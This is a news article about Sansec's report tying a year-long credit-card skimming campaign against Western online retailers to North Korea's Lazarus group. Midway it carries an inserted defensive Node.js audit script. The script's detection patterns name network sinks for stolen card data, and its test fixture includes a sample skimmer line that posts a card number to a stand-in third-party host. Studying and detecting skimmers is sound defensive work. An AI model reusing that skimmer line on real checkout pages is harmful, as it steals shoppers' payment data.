A Dutch cybersecurity firm called Sansec issued a report on Monday accusing North Korean hackers of waging a year-long campaign to steal credit card information from American and European online retailers.
Sansec did not offer an estimate of how much money might have been stolen by the hackers, but it noted cyber-theft campaigns are a major source of revenue for the North Korean military in an era of tight sanctions, including at least $2 billion stolen from primarily South Korean targets in 2019. The biggest online retail target named by Sansec was Claire’s, an online fashion store, which was hit by skimming attacks in April and June.
The hackers belong to a group classified as an Advanced Persistent Threat (APT) under the name “Lazarus” by some security analysts and known as “HIDDEN COBRA” by others.
Beginning in May 2019, the group began expanding from South Korean digital heists in a big way, attacking online retailers in the United States and Europe with a technique known as “digital skimming” or “Magecart,” the latter name derived from a hacking consortium that began targeting online shopping carts in 2015.
Digital skimming is the virtual version of the mechanical skimmers thieves have been known to plant on gas pumps and other easily accessible credit card swipers. In a digital skimming attack, the hackers plant malware code in an online retail site that intercepts transactions and sends the credit card information to a server controlled by the hackers.
Planting this code is generally thought to require administrative access to the targeted website, which Sansec believes APT Lazarus/HIDDEN COBRA obtained using spear-phishing techniques – i.e. using phony emails and booby-trapped websites to trick legitimate users into giving away their login names and passwords.
Phishing campaigns are branching out into social media and text messaging in addition to email, with the added danger that such platforms have fewer defenses against malicious links than the major email providers, and users burned by years of email scams are more likely to respond to phishing texts, tweets, and Facebook posts, or click on poisoned web links contained within them.
One unusual twist in the APT Lazarus/HIDDEN COBRA campaign is that the hackers also stole access to the servers they used to coordinate their global crime wave. Hackers usually set up their own highly secure servers to stash their digital loot, but this group hijacked several commercial servers to receive their stolen credit card numbers until they were ready to sell the data on the dark web, including “a modeling agency from Milan, a vintage music store from Tehran, and a family-run book store from New Jersey.”
Sansec – which, it should be noted, specializes in providing electronic security for online shopping carts – said this particular skimming operation was also different from its largely Russian and Indonesian predecessors because it used techniques and code that have been associated with North Korean state-sponsored hackers.
The virus-laced phishing emails used to obtain the passwords needed to plant the malware were reportedly identical to earlier North Korean phishing attacks, and some of the IP addresses used by the malware are known to be North Korean assets. Sansec’s analysts judged it “extremely unlikely” that all of these similarities could be coincidental.
“Sansec has found proof of global skimming activity that has multiple, independent links to previously documented, North Korea attributed hacking operations. Sansec believes that North Korean state sponsored actors have engaged in large scale digital skimming activity since at least May 2019,” the report concluded.
ZDNet on Tuesday noted the skimming crime wave fits in perfectly with North Korea’s increasingly “brazen hacking campaigns,” including electronic ATM robberies, cryptocurrency scams, and the deeply alarming WannaCry ransomware attack of 2017. WannaCry sent the online community into a panic and threatened to collapse several national economies, and most experts believe it was merely a bungled test run for a much more dangerous hacking campaign Pyongyang plans for the future.
A roundtable of online security analysts put together by Security Magazine on Tuesday saw the North Korean skimming campaign as an ominous development. Contributors noted that skimming is notoriously difficult for system administrators to detect, block, or track once hackers gain access to the shopping cart code on a website, and it is completely invisible to consumers, who have no way of knowing their credit card data is being copied and sent to hackers for resale on the black market.
Another troubling idea raised by Security Magazine’s contributors is that credit card numbers are not the only data that can be invisibly skimmed from compromised websites. Virtually anything a user types into the site could be copied, including highly sensitive personal or corporate data.
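The detection difficulty described above comes from skimmer code looking like any other checkout script, and the campaign's use of hijacked legitimate shops as drop servers means a blocklist of known-bad domains gives little protection. The following added example (not code from Sansec or the article) is a defender-side audit of a checkout page that allowlists first-party hosts instead and flags external scripts, off-site form actions, and inline scripts that both read payment fields and reach a network sink; all hostnames and HTML snippets in it are constructed.

```javascript
// Added example: checkout-page audit for skimmer indicators (Node.js, no dependencies).
// Allowlist of first-party hosts (assumed / constructed for this example).
const ALLOWED_HOSTS = new Set(["shop.example", "cdn.example"]);

// Network sinks a page script could use to send captured form data off-site.
const EXFIL_SINKS = /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b|\.src\s*=/;
// Field names indicating payment data is being read from the DOM.
const CARD_FIELDS = /\b(cardnumber|card_number|cvv|cvc|expir\w*|ccnum)\b/i;

// Resolve a possibly relative URL against the page host and return its hostname.
function hostOf(url, pageHost) {
  try { return new URL(url, `https://${pageHost}/`).hostname; } catch { return null; }
}

// Returns findings as {kind, detail}; an empty array means nothing was flagged.
function auditCheckoutPage(html, pageHost, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  // 1. External scripts loaded from hosts outside the allowlist.
  for (const m of html.matchAll(/<script\b[^>]*\bsrc=["']([^"']+)["'][^>]*>/gi)) {
    const host = hostOf(m[1], pageHost);
    if (!host || !allowedHosts.has(host)) findings.push({ kind: "foreign-script", detail: m[1] });
  }
  // 2. Inline scripts that both touch card fields and reach a network sink.
  for (const m of html.matchAll(/<script\b(?![^>]*\bsrc=)[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = m[1];
    if (CARD_FIELDS.test(body) && EXFIL_SINKS.test(body)) {
      findings.push({ kind: "inline-card-exfil", detail: body.trim().slice(0, 60) });
    }
  }
  // 3. Forms that submit anywhere other than an allowlisted host.
  for (const m of html.matchAll(/<form\b[^>]*\baction=["']([^"']+)["']/gi)) {
    const host = hostOf(m[1], pageHost);
    if (!host || !allowedHosts.has(host)) findings.push({ kind: "foreign-form-action", detail: m[1] });
  }
  return findings;
}

// Constructed sample: a clean checkout page, then the same page with an injected inline script
// that reads the card field and posts it to a third-party host (hostname is made up).
const CLEAN_PAGE = `<form action="/pay"><input name="cardnumber"></form>
<script src="https://cdn.example/checkout.js"></script>`;
const INJECTED_PAGE = CLEAN_PAGE +
  `<script>fetch("https://hijacked-bookstore.example/c", {method: "POST", body: cardnumber.value})</script>`;

console.log(auditCheckoutPage(CLEAN_PAGE, "shop.example"));     // []
console.log(auditCheckoutPage(INJECTED_PAGE, "shop.example"));  // one "inline-card-exfil" finding
```

Run this against a saved copy of the live checkout page on a schedule and diff the findings against a known-good baseline; a new foreign host or a new inline script touching card fields is the signal to investigate.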
“It has been discussed in the intelligence circles for years that the boundary between nation state and cybercrime is becoming blurred. Nation state actors have been re-purposing, buying, and using more mainstream cybercrime tools and services to obfuscate their activity,” Netenrich security chief Brandon Hoffman warned.